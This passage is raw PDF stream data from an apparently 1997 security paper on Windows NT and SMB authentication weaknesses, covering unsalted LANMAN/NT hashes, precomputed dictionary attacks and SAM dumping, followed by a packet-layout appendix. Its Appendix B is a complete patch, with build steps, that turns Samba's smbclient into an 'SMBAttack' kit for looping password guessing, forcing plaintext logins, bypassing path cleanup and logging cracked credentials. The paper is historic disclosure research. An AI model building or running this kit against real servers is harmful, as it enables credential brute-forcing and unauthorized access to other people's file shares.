1 54 659.4 Tm (various places such as .PWL files and registry entries, to support the) Tj 1 0 0 1 54 648.9 Tm ("automatic drive reconnect" stuff. NT apparently also stores information) Tj 1 0 0 1 54 638.4 Tm (about the last ten domain-level user logons in the registry, for use in cases) Tj 1 0 0 1 54 627.9 Tm (when the PDC is unreachable.) Tj 1 0 0 1 54 606.9 Tm (Since there is no salting in the OWF transform, even the generic old Unix) Tj 1 0 0 1 54 596.4 Tm (crypt\(\) algorithm is stronger than this scheme. An entire dictionary's worth) Tj 1 0 0 1 54 585.9 Tm (of passwords and permutations thereof can be *precomputed* and stored, which) Tj 1 0 0 1 54 575.4 Tm (reduces an OWF dictionary attack to a big database lookup. The block-mode ECB) Tj 1 0 0 1 54 564.9 Tm (encryption scheme further implies that only the first 8 bytes of the OWF hash) Tj 1 0 0 1 54 554.4 Tm (really need to be saved; a successful 8-byte match not only brackets a greatly) Tj 1 0 0 1 54 543.9 Tm (reduced dictionary segment, it directly reveals the first seven characters of) Tj 1 0 0 1 54 533.4 Tm (a LANMAN-style password. Related to this is that the challenge-response) Tj 1 0 0 1 54 522.9 Tm (protocol also uses simple ECB of a known plaintext with no chaining or) Tj 1 0 0 1 54 512.4 Tm (feedback. Response keys derived from the OWF are invariant and can be) Tj 1 0 0 1 54 501.9 Tm (similarly precomputed. The first stage of an attack on a recorded session) Tj 1 0 0 1 54 491.4 Tm (setup only requires the cryptkey and the first 8 bytes from both the) Tj 1 0 0 1 54 480.9 Tm (precomputed response dictionary and the 24-byte response, and DES encryption) Tj 1 0 0 1 54 470.4 Tm (of a single block determines whether to bother with the remaining two. Again,) Tj 1 0 0 1 54 459.9 Tm (cracking just the first block can index down to a much smaller chunk of the) Tj 1 0 0 1 54 449.4 Tm (dictionary. Under NT LM dialect, NT clients usually send *both* response) Tj 1 0 0 1 54 438.9 Tm (types in the SetupAndX, which again defeats the whole purpose of the NT style) Tj 1 0 0 1 54 428.4 Tm (password since cracking the plaintext of the reduced keyspace LANMAN password) Tj 1 0 0 1 54 417.9 Tm (can serve as a template for cracking the user's "real" NT password.) Tj 1 0 0 1 54 396.9 Tm (Normally the SAM registry section on an NT server is protected against) Tj 1 0 0 1 54 386.4 Tm (reading. An adminstrator can nonetheless take ownership of the whole SAM) Tj 1 0 0 1 54 375.9 Tm (hive, and dump out various subkeys under Domains\\Account\\Users\\{hex-values}.) Tj 1 0 0 1 54 365.4 Tm (It is fairly clear from diffing ASCII hive dumps that the 32 bytes at the end) Tj 1 0 0 1 54 354.9 Tm (of the respective "V" binary blocks correspond to OWF password storage. We) Tj 1 0 0 1 54 344.4 Tm (can observe corresponding changes to at least the same-length fields in the) Tj 1 0 0 1 54 333.9 Tm (Samba "smbpasswd" file. The 32 bytes represent the LANMAN and NT OWF hashes,) Tj 1 0 0 1 54 323.4 Tm (but on NT are re-encrypted under some other set of keys. Attempts to find) Tj 1 0 0 1 54 312.9 Tm (these meta-keys by trying likely-looking DES-size blocks elsewhere around the) Tj 1 0 0 1 54 302.4 Tm (registry have thus far failed, but the answer may be discoverable with a) Tj 1 0 0 1 54 291.9 Tm (little more effort. Anyone who already knows the true magic here is of course) Tj 1 0 0 1 54 281.4 Tm (encouraged to speak up, even if anonymously.) Tj 1 0 0 1 54 260.4 Tm (Inter-domain trust relationships are another NT-specific issue and were not) Tj 1 0 0 1 54 249.9 Tm (studied here, but surely need to be investigated more closely. Various) Tj 1 0 0 1 54 239.4 Tm (documentation mentions that a "secure channel" is established between domain) Tj 1 0 0 1 54 228.9 Tm (controllers using the special DOMAIN$ accounts and a some kind of "secret) Tj 1 0 0 1 54 218.4 Tm (object" which apparently is often derived from a human-chosen password. The) Tj 1 0 0 1 54 207.9 Tm (channel is apparently an RPC session, but is it truly encrypted, and if so,) Tj 1 0 0 1 54 197.4 Tm (how? Would this imply that some mechanism for encrypted SMB does exist after) Tj 1 0 0 1 54 186.9 Tm (all, but for some reason is not made available to the end users? What about) Tj 1 0 0 1 54 176.4 Tm (backup domain-controller replication, which implies that one machine can suck) Tj 1 0 0 1 54 165.9 Tm (down the entire SAM database of another? How about an analysis of encryption) Tj 1 0 0 1 54 155.4 Tm (across PPTP VPNs? Someone else may be able to answer these questions too.) Tj 1 0 0 1 54 134.4 Tm (Appendix B: The Patch Kit) Tj 1 0 0 1 54 123.9 Tm (=========================) Tj 1 0 0 1 54 102.9 Tm (This illustrates some minimal changes needed to turn smbclient into a) Tj 1 0 0 1 54 92.4 Tm (rudimentary attack kit. It does not cover *every* possibility of protocol) Tj 1 0 0 1 54 81.9 Tm (weakness by any means, but is enough to get going with some fairly serious) Tj ET Q endstream endobj 170 0 obj 5474 endobj 165 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R168 168 0 R >> >> /Contents [ 166 0 R 169 0 R ] >> endobj 172 0 obj << /Length 173 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 173 0 obj 48 endobj 174 0 obj << /Type /Font /Name /R174 /Subtype /Type1 /BaseFont /Courier >> endobj 175 0 obj << /Length 176 0 R >> stream BT /R174 10 Tf 1 0 0 1 54 711.9 Tm (host-level attacks. Briefly, the following changes are effected:) Tj 1 0 0 1 54 690.9 Tm ( Adds the interpret_error routine to help straighten out server errors) Tj 1 0 0 1 54 669.9 Tm ( Corrects conversion of security mode) Tj 1 0 0 1 54 648.9 Tm ( Loops forever reading new trial passwords from standard input) Tj 1 0 0 1 54 627.9 Tm ( No-ops out the dos_clean_name\(\) path cleanup routine, and allows) Tj 1 0 0 1 54 617.4 Tm ( changing to what appear to be "bad" directory paths.) Tj 1 0 0 1 54 596.4 Tm ( Fixes nmblookup to use local UDP port 137 and verbatim scope ID) Tj 1 0 0 1 54 575.4 Tm (Apply the patch using your favorite method for doing so; extracting it to a) Tj 1 0 0 1 54 564.9 Tm (file and doing "patch < file" generally suffices. Configure the Makefile for) Tj 1 0 0 1 54 554.4 Tm (your platform, and add -DATTACK to FLAGS1. If you want all passwords) Tj 1 0 0 1 54 543.9 Tm (automatically uppercased, also add -DUPPERCASE. This is optional, since) Tj 1 0 0 1 54 533.4 Tm (mixed-case passwords are sometimes needed. Don't define PASSWD_FLAGS, so the) Tj 1 0 0 1 54 522.9 Tm (client cannot use password encryption. Finally, do "make smbclient nmblookup") Tj 1 0 0 1 54 512.4 Tm (to build the two programs.) Tj 1 0 0 1 54 491.4 Tm (These changes are decidedly quick and dirty, but should illustrate how to) Tj 1 0 0 1 54 480.9 Tm (begin putting together a much more sophisticated tool. Looking a little) Tj 1 0 0 1 54 470.4 Tm (farther forward immediately shows several improvements not implemented here:) Tj 1 0 0 1 54 459.9 Tm (The send_login routine covers three important steps in one linear shot and) Tj 1 0 0 1 54 449.4 Tm (should be split up into its logically separate SMB steps. Several more) Tj 1 0 0 1 54 438.9 Tm (commands can be added, to swap between arbitrary sharenames, UIDs, TIDs and) Tj 1 0 0 1 54 428.4 Tm (other possibly relevant parameters. Overall, the entire breakin scenario) Tj 1 0 0 1 54 417.9 Tm (can be highly automated.) Tj 1 0 0 1 54 396.9 Tm ( !-- chop --!) Tj 1 0 0 1 54 386.4 Tm (*** client.c Mon Jan 15 03:56:44 1996) Tj 1 0 0 1 54 375.9 Tm (--- attack/client.c Thu Jan 30 23:14:59 1997) Tj 1 0 0 1 54 365.4 Tm (***************) Tj 1 0 0 1 54 354.9 Tm (*** 80,81 ****) Tj 1 0 0 1 54 344.4 Tm (--- 80,152 ----) Tj 1 0 0 1 54 333.9 Tm ( ) Tj 1 0 0 1 54 323.4 Tm (+ /* Avian Research demo "SMBAttack" patch kit. _H*/) Tj 1 0 0 1 54 312.9 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 302.4 Tm (+ unsigned int cur_err;) Tj 1 0 0 1 54 291.9 Tm (+ ) Tj 1 0 0 1 54 281.4 Tm (+ #define dos_clean_name donothing) Tj 1 0 0 1 54 270.9 Tm (+ void donothing \(\) { return; }) Tj 1 0 0 1 54 260.4 Tm (+ ) Tj 1 0 0 1 54 249.9 Tm (+ #define getpass readpass) Tj 1 0 0 1 54 239.4 Tm (+ char * readpass \(prompt\)) Tj 1 0 0 1 54 228.9 Tm (+ char * prompt;) Tj 1 0 0 1 54 218.4 Tm (+ {) Tj 1 0 0 1 54 207.9 Tm (+ char pb [256];) Tj 1 0 0 1 54 197.4 Tm (+ char * pp = NULL;) Tj 1 0 0 1 54 186.9 Tm (+ ) Tj 1 0 0 1 54 176.4 Tm (+ DEBUG\(1,\(prompt\)\);) Tj 1 0 0 1 54 165.9 Tm (+ pp = fgets \(pb, 128, stdin\);) Tj 1 0 0 1 54 155.4 Tm (+ if \(feof \(stdin\)\) exit \(0\);) Tj 1 0 0 1 54 144.9 Tm (+ if \(pp\) {) Tj 1 0 0 1 54 134.4 Tm (+ pp [\(strlen \(pp\) - 1\)] = '\\0'; /* rip the newline */) Tj 1 0 0 1 54 123.9 Tm (+ #ifdef UPPERCASE) Tj 1 0 0 1 54 113.4 Tm (+ strupper \(pp\); /* maybe upcase it? XXX */) Tj 1 0 0 1 54 102.9 Tm (+ #endif) Tj 1 0 0 1 54 92.4 Tm (+ strcpy \(password, pp\); /* and save it */) Tj 1 0 0 1 54 81.9 Tm (+ }) Tj ET Q endstream endobj 176 0 obj 3631 endobj 171 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R174 174 0 R >> >> /Contents [ 172 0 R 175 0 R ] >> endobj 178 0 obj << /Length 179 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 179 0 obj 48 endobj 180 0 obj << /Type /Font /Name /R180 /Subtype /Type1 /BaseFont /Courier >> endobj 181 0 obj << /Length 182 0 R >> stream BT /R180 10 Tf 1 0 0 1 54 711.9 Tm (+ return \(pp\);) Tj 1 0 0 1 54 701.4 Tm (+ } /* readpass */) Tj 1 0 0 1 54 690.9 Tm (+ ) Tj 1 0 0 1 54 680.4 Tm (+ /****************************************************************************) Tj 1 0 0 1 54 669.9 Tm (+ The error returns from various platforms are many and varied, but all of) Tj 1 0 0 1 54 659.4 Tm (+ them mean a couple of basic things. This boils relevant ones down roughly) Tj 1 0 0 1 54 648.9 Tm (+ to common server-class status, i.e.:) Tj 1 0 0 1 54 638.4 Tm (+ 0 success) Tj 1 0 0 1 54 627.9 Tm (+ 2 access denied, or wrong username/passwd for session OR share) Tj 1 0 0 1 54 617.4 Tm (+ 5 network-ID not found, for session) Tj 1 0 0 1 54 606.9 Tm (+ 6 sharename not found, TCon problem) Tj 1 0 0 1 54 596.4 Tm (+ 1 anything else, probably fatal, including disabled accounts,) Tj 1 0 0 1 54 585.9 Tm (+ negotiation problems, etc) Tj 1 0 0 1 54 575.4 Tm (+ ****************************************************************************/) Tj 1 0 0 1 54 564.9 Tm (+ static int interpret_error \(rcls, err\)) Tj 1 0 0 1 54 554.4 Tm (+ unsigned char rcls;) Tj 1 0 0 1 54 543.9 Tm (+ uint16 err;) Tj 1 0 0 1 54 533.4 Tm (+ {) Tj 1 0 0 1 54 522.9 Tm (+ if \(\(rcls == 0\) && \(err == 0\)\) return \(0\); /* no error */) Tj 1 0 0 1 54 512.4 Tm (+ if \(rcls == ERRSRV\) {) Tj 1 0 0 1 54 501.9 Tm (+ if \(err == 1\) return \(1\); /* non-specific error */) Tj 1 0 0 1 54 491.4 Tm (+ if \(err == 2\) return \(2\); /* bad name or password */) Tj 1 0 0 1 54 480.9 Tm (+ if \(err == 4\) return \(1\); /* insufficient access for function */) Tj 1 0 0 1 54 470.4 Tm (+ if \(err == 5\) return \(5\); /* invalid TID */) Tj 1 0 0 1 54 459.9 Tm (+ if \(err == 6\) return \(6\); /* invalid network name */) Tj 1 0 0 1 54 449.4 Tm (+ if \(err == 7\) return \(6\); /* invalid device */) Tj 1 0 0 1 54 438.9 Tm (+ if \(err == 1311\) return \(1\); /* no login servers available [?] */) Tj 1 0 0 1 54 428.4 Tm (+ if \(err == 2239\) return \(1\); /* account expired or disabled */) Tj 1 0 0 1 54 417.9 Tm (+ } /* ERRSRV */) Tj 1 0 0 1 54 407.4 Tm (+ if \(rcls == ERRDOS\) {) Tj 1 0 0 1 54 396.9 Tm (+ if \(err == 5\) return \(2\); /* access denied */) Tj 1 0 0 1 54 386.4 Tm (+ if \(err == 65\) return \(1\); /* network access denied */) Tj 1 0 0 1 54 375.9 Tm (+ if \(err == 67\) return \(6\); /* network name not found */) Tj 1 0 0 1 54 365.4 Tm (+ if \(err == 71\) return \(1\); /* no more connections */) Tj 1 0 0 1 54 354.9 Tm (+ if \(err == 86\) return \(2\); /* network password incorrect */) Tj 1 0 0 1 54 344.4 Tm (+ if \(err == 87\) return \(1\); /* parameter incorrect */) Tj 1 0 0 1 54 333.9 Tm (+ if \(err == 90\) return \(1\); /* too many UIDs */) Tj 1 0 0 1 54 323.4 Tm (+ /* XXX: the rest of these might be ERRSRVs too -- all return 1 anyways, so wtf. */) Tj 1 0 0 1 54 312.9 Tm (+ if \(err == 2240\) return \(1\); /* access denied from this WS */) Tj 1 0 0 1 54 302.4 Tm (+ if \(err == 2241\) return \(1\); /* access denied at this time */) Tj 1 0 0 1 54 291.9 Tm (+ if \(err == 2242\) return \(1\); /* password expired */) Tj 1 0 0 1 54 281.4 Tm (+ if \(err == 2247\) return \(1\); /* security database corrupted */) Tj 1 0 0 1 54 270.9 Tm (+ if \(err == 2455\) return \(1\); /* invalid workgroup */) Tj 1 0 0 1 54 260.4 Tm (+ } /* ERRDOS */) Tj 1 0 0 1 54 249.9 Tm (+ return \(1\); /* didn't find any mapping */) Tj 1 0 0 1 54 239.4 Tm (+ } /* interpret_error */) Tj 1 0 0 1 54 228.9 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 218.4 Tm ( ) Tj 1 0 0 1 54 207.9 Tm (***************) Tj 1 0 0 1 54 197.4 Tm (*** 171,172 ****) Tj 1 0 0 1 54 186.9 Tm (--- 242,247 ----) Tj 1 0 0 1 54 176.4 Tm ( SSVAL\(outbuf,smb_flg2,0x1\);) Tj 1 0 0 1 54 165.9 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 155.4 Tm (+ SCVAL\(outbuf,smb_flg,0x18\); /* already-canonical filenames */) Tj 1 0 0 1 54 144.9 Tm (+ SSVAL\(outbuf,smb_flg2,0x2001\); /* execute perm == read perm [?] */) Tj 1 0 0 1 54 134.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 123.9 Tm ( }) Tj 1 0 0 1 54 113.4 Tm (***************) Tj 1 0 0 1 54 102.9 Tm (*** 282,283 ****) Tj 1 0 0 1 54 92.4 Tm (--- 357,364 ----) Tj 1 0 0 1 54 81.9 Tm ( ) Tj ET Q endstream endobj 182 0 obj 4538 endobj 177 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R180 180 0 R >> >> /Contents [ 178 0 R 181 0 R ] >> endobj 184 0 obj << /Length 185 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 185 0 obj 48 endobj 186 0 obj << /Type /Font /Name /R186 /Subtype /Type1 /BaseFont /Courier >> endobj 187 0 obj << /Length 188 0 R >> stream BT /R186 10 Tf 1 0 0 1 54 711.9 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 701.4 Tm (+ /* we don't care if it's a bad path or not */) Tj 1 0 0 1 54 690.9 Tm (+ if \(report && CVAL\(inbuf,smb_rcls\) != 0\)) Tj 1 0 0 1 54 680.4 Tm (+ DEBUG\(2,\(" [but continuing anyway]\\n"\)\);) Tj 1 0 0 1 54 669.9 Tm (+ return \(True\);) Tj 1 0 0 1 54 659.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 648.9 Tm ( return\(CVAL\(inbuf,smb_rcls\) == 0\);) Tj 1 0 0 1 54 638.4 Tm (***************) Tj 1 0 0 1 54 627.9 Tm (*** 447,450 ****) Tj 1 0 0 1 54 617.4 Tm (--- 528,533 ----) Tj 1 0 0 1 54 606.9 Tm ( strcpy\(dname,cur_dir\);) Tj 1 0 0 1 54 596.4 Tm (+ #ifndef ATTACK) Tj 1 0 0 1 54 585.9 Tm ( strcat\(cur_dir,"\\\\"\);) Tj 1 0 0 1 54 575.4 Tm ( dos_clean_name\(cur_dir\);) Tj 1 0 0 1 54 564.9 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 554.4 Tm ( ) Tj 1 0 0 1 54 543.9 Tm (***************) Tj 1 0 0 1 54 533.4 Tm (*** 834,837 ****) Tj 1 0 0 1 54 522.9 Tm ( if \(CVAL\(inbuf,smb_rcls\) != 0\)) Tj 1 0 0 1 54 512.4 Tm ( return\(False\);) Tj 1 0 0 1 54 501.9 Tm (! ) Tj 1 0 0 1 54 491.4 Tm ( /* parse out the lengths */) Tj 1 0 0 1 54 480.9 Tm (--- 917,927 ----) Tj 1 0 0 1 54 470.4 Tm ( if \(CVAL\(inbuf,smb_rcls\) != 0\)) Tj 1 0 0 1 54 459.9 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 449.4 Tm (+ /* show us why */) Tj 1 0 0 1 54 438.9 Tm (+ {) Tj 1 0 0 1 54 428.4 Tm (+ DEBUG \(0,\("Trans failed: %s\\n", smb_errstr \(inbuf\)\)\);) Tj 1 0 0 1 54 417.9 Tm (+ return \(False\);) Tj 1 0 0 1 54 407.4 Tm (+ }) Tj 1 0 0 1 54 396.9 Tm (+ #else) Tj 1 0 0 1 54 386.4 Tm ( return\(False\);) Tj 1 0 0 1 54 375.9 Tm (! #endif /* ATTACK */) Tj 1 0 0 1 54 365.4 Tm ( /* parse out the lengths */) Tj 1 0 0 1 54 354.9 Tm (***************) Tj 1 0 0 1 54 344.4 Tm (*** 3014,3016 ****) Tj 1 0 0 1 54 333.9 Tm ( ) Tj 1 0 0 1 54 323.4 Tm (! DEBUG\(3,\("Sec mode %d\\n",SVAL\(inbuf,smb_vwv1\)\)\);) Tj 1 0 0 1 54 312.9 Tm ( DEBUG\(3,\("max xmt %d\\n",max_xmit\)\);) Tj 1 0 0 1 54 302.4 Tm (--- 3104,3106 ----) Tj 1 0 0 1 54 291.9 Tm ( ) Tj 1 0 0 1 54 281.4 Tm (! DEBUG\(3,\("Sec mode %d\\n",sec_mode\)\); /* fixt. _H*/) Tj 1 0 0 1 54 270.9 Tm ( DEBUG\(3,\("max xmt %d\\n",max_xmit\)\);) Tj 1 0 0 1 54 260.4 Tm (***************) Tj 1 0 0 1 54 249.9 Tm (*** 3020,3021 ****) Tj 1 0 0 1 54 239.4 Tm (--- 3110,3119 ----) Tj 1 0 0 1 54 228.9 Tm ( doencrypt = \(\(sec_mode & 2\) != 0\);) Tj 1 0 0 1 54 218.4 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 207.9 Tm (+ /* don't encrypt, period */) Tj 1 0 0 1 54 197.4 Tm (+ doencrypt = 0;) Tj 1 0 0 1 54 186.9 Tm (+ /* don't screw with SessSetupX step unless we genuinely need it */) Tj 1 0 0 1 54 176.4 Tm (+ use_setup = \(\(sec_mode & 1\) != 0\);) Tj 1 0 0 1 54 165.9 Tm (+ /* always read a password anyways */) Tj 1 0 0 1 54 155.4 Tm (+ got_pass = 0;) Tj 1 0 0 1 54 144.9 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 134.4 Tm ( ) Tj 1 0 0 1 54 123.9 Tm (***************) Tj 1 0 0 1 54 113.4 Tm (*** 3103,3104 ****) Tj 1 0 0 1 54 102.9 Tm (--- 3201,3211 ----) Tj 1 0 0 1 54 92.4 Tm ( ) Tj 1 0 0 1 54 81.9 Tm (+ #ifdef ATTACK) Tj ET Q endstream endobj 188 0 obj 3113 endobj 183 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R186 186 0 R >> >> /Contents [ 184 0 R 187 0 R ] >> endobj 190 0 obj << /Length 191 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 191 0 obj 48 endobj 192 0 obj << /Type /Font /Name /R192 /Subtype /Type1 /BaseFont /Courier >> endobj 193 0 obj << /Length 194 0 R >> stream BT /R192 10 Tf 1 0 0 1 54 711.9 Tm (+ cur_err = interpret_error \() Tj 1 0 0 1 54 701.4 Tm (+ CVAL \(inbuf, smb_rcls\), SVAL \(inbuf, smb_err\)\);) Tj 1 0 0 1 54 690.9 Tm (+ if \(cur_err == 2\) {) Tj 1 0 0 1 54 680.4 Tm (+ DEBUG \(2, \("session setup failed: %s\\n", smb_errstr \(inbuf\)\)\);) Tj 1 0 0 1 54 669.9 Tm (+ goto get_pass;) Tj 1 0 0 1 54 659.4 Tm (+ }) Tj 1 0 0 1 54 648.9 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 638.4 Tm (+ ) Tj 1 0 0 1 54 627.9 Tm ( if \(CVAL\(inbuf,smb_rcls\) != 0\)) Tj 1 0 0 1 54 617.4 Tm (***************) Tj 1 0 0 1 54 606.9 Tm (*** 3129,3130 ****) Tj 1 0 0 1 54 596.4 Tm (--- 3236,3241 ----) Tj 1 0 0 1 54 585.9 Tm ( ) Tj 1 0 0 1 54 575.4 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 564.9 Tm (+ /* we're in */) Tj 1 0 0 1 54 554.4 Tm (+ DEBUG\(0,\("session established as %s/%s\\n", username, password\)\);) Tj 1 0 0 1 54 543.9 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 533.4 Tm ( if \(Protocol >= PROTOCOL_NT1\) {) Tj 1 0 0 1 54 522.9 Tm (***************) Tj 1 0 0 1 54 512.4 Tm (*** 3193,3194 ****) Tj 1 0 0 1 54 501.9 Tm (--- 3304,3313 ----) Tj 1 0 0 1 54 491.4 Tm ( ) Tj 1 0 0 1 54 480.9 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 470.4 Tm (+ cur_err = interpret_error \() Tj 1 0 0 1 54 459.9 Tm (+ CVAL \(inbuf, smb_rcls\), SVAL \(inbuf, smb_err\)\);) Tj 1 0 0 1 54 449.4 Tm (+ if \(cur_err == 2\) {) Tj 1 0 0 1 54 438.9 Tm (+ DEBUG \(2, \("TCon failed: %s\\n", smb_errstr \(inbuf\)\)\);) Tj 1 0 0 1 54 428.4 Tm (+ goto get_pass;) Tj 1 0 0 1 54 417.9 Tm (+ }) Tj 1 0 0 1 54 407.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 396.9 Tm ( /* trying again with a blank password */) Tj 1 0 0 1 54 386.4 Tm (***************) Tj 1 0 0 1 54 375.9 Tm (*** 3217,3219 ****) Tj 1 0 0 1 54 365.4 Tm ( ) Tj 1 0 0 1 54 354.9 Tm (! ) Tj 1 0 0 1 54 344.4 Tm ( max_xmit = MIN\(max_xmit,BUFFER_SIZE-4\);) Tj 1 0 0 1 54 333.9 Tm (--- 3336,3341 ----) Tj 1 0 0 1 54 323.4 Tm ( ) Tj 1 0 0 1 54 312.9 Tm (! #ifdef ATTACK) Tj 1 0 0 1 54 302.4 Tm (! /* we're in */) Tj 1 0 0 1 54 291.9 Tm (! DEBUG\(0,\("tcon %s connected as %s/%s\\n", service, username, password\)\);) Tj 1 0 0 1 54 281.4 Tm (! #endif /* ATTACK */) Tj 1 0 0 1 54 270.9 Tm ( max_xmit = MIN\(max_xmit,BUFFER_SIZE-4\);) Tj 1 0 0 1 54 260.4 Tm (***************) Tj 1 0 0 1 54 249.9 Tm (*** 3863,3865 ****) Tj 1 0 0 1 54 239.4 Tm ( receive_smb\(Client,buffer,0\);) Tj 1 0 0 1 54 228.9 Tm (! ) Tj 1 0 0 1 54 218.4 Tm ( #ifdef CLIX) Tj 1 0 0 1 54 207.9 Tm (--- 3985,3991 ----) Tj 1 0 0 1 54 197.4 Tm ( receive_smb\(Client,buffer,0\);) Tj 1 0 0 1 54 186.9 Tm (! #ifdef ATTACK) Tj 1 0 0 1 54 176.4 Tm (! /* don't send chkpath-keepalives on a nonexistent tcon */) Tj 1 0 0 1 54 165.9 Tm (! if \(cnum == 0\)) Tj 1 0 0 1 54 155.4 Tm (! continue;) Tj 1 0 0 1 54 144.9 Tm (! #endif /* ATTACK */ ) Tj 1 0 0 1 54 134.4 Tm ( #ifdef CLIX) Tj 1 0 0 1 54 123.9 Tm (***************) Tj 1 0 0 1 54 113.4 Tm (*** 4043,4044 ****) Tj 1 0 0 1 54 102.9 Tm (--- 4169,4177 ----) Tj 1 0 0 1 54 92.4 Tm ( umask\(myumask\);) Tj 1 0 0 1 54 81.9 Tm (+ #ifdef ATTACK) Tj ET Q endstream endobj 194 0 obj 3189 endobj 189 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R192 192 0 R >> >> /Contents [ 190 0 R 193 0 R ] >> endobj 196 0 obj << /Length 197 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 197 0 obj 48 endobj 198 0 obj << /Type /Font /Name /R198 /Subtype /Type1 /BaseFont /Courier >> endobj 199 0 obj << /Length 200 0 R >> stream BT /R198 10 Tf 1 0 0 1 54 711.9 Tm (+ /* oh, c'mon. */) Tj 1 0 0 1 54 701.4 Tm (+ pid = 2048;) Tj 1 0 0 1 54 690.9 Tm (+ uid = 0;) Tj 1 0 0 1 54 680.4 Tm (+ gid = 0;) Tj 1 0 0 1 54 669.9 Tm (+ mid = 2048;) Tj 1 0 0 1 54 659.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 648.9 Tm ( ) Tj 1 0 0 1 54 638.4 Tm (*** nmblookup.c Thu Jan 30 20:52:47 1997) Tj 1 0 0 1 54 627.9 Tm (--- attack/nmblookup.c Tue Jan 21 01:39:16 1997) Tj 1 0 0 1 54 617.4 Tm (***************) Tj 1 0 0 1 54 606.9 Tm (*** 54,56 ****) Tj 1 0 0 1 54 596.4 Tm (--- 54,60 ----) Tj 1 0 0 1 54 585.9 Tm ( ) Tj 1 0 0 1 54 575.4 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 564.9 Tm (+ ServerFD = open_socket_in\(SOCK_DGRAM, 137,3\);) Tj 1 0 0 1 54 554.4 Tm (+ #else) Tj 1 0 0 1 54 543.9 Tm ( ServerFD = open_socket_in\(SOCK_DGRAM, 0,3\);) Tj 1 0 0 1 54 533.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 522.9 Tm ( ) Tj 1 0 0 1 54 512.4 Tm (***************) Tj 1 0 0 1 54 501.9 Tm (*** 142,144 ****) Tj 1 0 0 1 54 491.4 Tm (--- 146,150 ----) Tj 1 0 0 1 54 480.9 Tm ( strcpy\(scope,optarg\);) Tj 1 0 0 1 54 470.4 Tm (+ #ifndef ATTACK) Tj 1 0 0 1 54 459.9 Tm ( strupper\(scope\);) Tj 1 0 0 1 54 449.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 438.9 Tm ( break;) Tj 1 0 0 1 54 428.4 Tm ( !-- chop --!) Tj 1 0 0 1 54 407.4 Tm (Appendix C: Overview of an SMB packet) Tj 1 0 0 1 54 396.9 Tm (=====================================) Tj 1 0 0 1 54 375.9 Tm (This is [roughly] the structure of an SMB packet as found inside the TCP) Tj 1 0 0 1 54 365.4 Tm (payload and Samba's internal buffers. The leading length integer is not part) Tj 1 0 0 1 54 354.9 Tm (of the SMB proper, and does not always appear under other transport types.) Tj 1 0 0 1 54 344.4 Tm (For further details, see CIFS section 2.4.) Tj 1 0 0 1 54 323.4 Tm (offset name size contents / comments) Tj 1 0 0 1 54 312.9 Tm (~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~) Tj 1 0 0 1 54 302.4 Tm ( 0 [length int.] 4 TCP transport-layer data length) Tj 1 0 0 1 54 291.9 Tm ( 4 header start 4 0xFF, 'S', 'M', 'B') Tj 1 0 0 1 54 281.4 Tm ( 8 SMB command 1 cmd code) Tj 1 0 0 1 54 270.9 Tm ( 9 smb_rcls 2 error class; 0 = no error) Tj 1 0 0 1 54 260.4 Tm (11 smb_err 2 error code ; 0 = no error) Tj 1 0 0 1 54 249.9 Tm (13 smb_flg 1) Tj 1 0 0 1 54 239.4 Tm (14 smb_flg2 2) Tj 1 0 0 1 54 228.9 Tm (16 [filler] 12) Tj 1 0 0 1 54 218.4 Tm (28 TID 2) Tj 1 0 0 1 54 207.9 Tm (30 PID 2) Tj 1 0 0 1 54 197.4 Tm (32 UID 2) Tj 1 0 0 1 54 186.9 Tm (34 MID 2) Tj 1 0 0 1 54 176.4 Tm (36 word count 1 number of following parameter words) Tj 1 0 0 1 54 165.9 Tm (37 smb_vwv0 2 0x00FF [intel order] if no AndX cmd) Tj 1 0 0 1 54 155.4 Tm (39 smb_vwv1 2 0x0000 if no batched AndX stuff) Tj 1 0 0 1 54 144.9 Tm (41 smb_vwv2 2 ...) Tj 1 0 0 1 54 134.4 Tm ( ... to a variable length's worth ...) Tj 1 0 0 1 54 123.9 Tm (?? buffers * smb_buf\(\) finds this offset) Tj 1 0 0 1 54 113.4 Tm ( ... SMB ends at \(TCP-len + 4\) ...) Tj 1 0 0 1 54 92.4 Tm (_H* 970130) Tj ET Q endstream endobj 200 0 obj 3457 endobj 195 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R198 198 0 R >> >> /Contents [ 196 0 R 199 0 R ] >> endobj 2 0 obj << /Type 